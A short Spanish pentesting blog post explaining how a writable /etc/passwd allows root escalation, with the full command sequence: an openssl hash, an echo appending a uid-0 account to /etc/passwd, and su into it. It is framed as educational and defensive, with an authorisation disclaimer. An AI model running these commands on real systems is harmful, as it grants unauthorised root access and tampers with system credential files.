~ / blog / pentesting
KALI

/Etc/passwd escribible

Un error de permisos grave: si el archivo etc passwd es escribible por tu usuario, eres root en treinta segundos.

Generas un hash de contraseña con openssl, y añades una línea nueva al passwd creando un usuario con id cero, o sea, otro root, con tu contraseña. Luego cambias a esa cuenta con su.

Es viejísimo pero todavía aparece por scripts mal hechos. Revisa siempre los permisos de los archivos críticos del sistema.

# los comandos

www-data@victim:$ ls -l /etc/passwdcopiar
-rw-rw-r-- 1 root root /etc/passwd <- escribible!
www-data@victim:$ openssl passwd -1 -salt x hackeadocopiar
$1$x$aQ....
www-data@victim:$ echo 'hax:$1$x$aQ....:0:0:root:/root:/bin/bash' >> /etc/passwdcopiar
www-data@victim:$ su haxcopiar
Password:
root@victim:# id -> uid=0(root)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.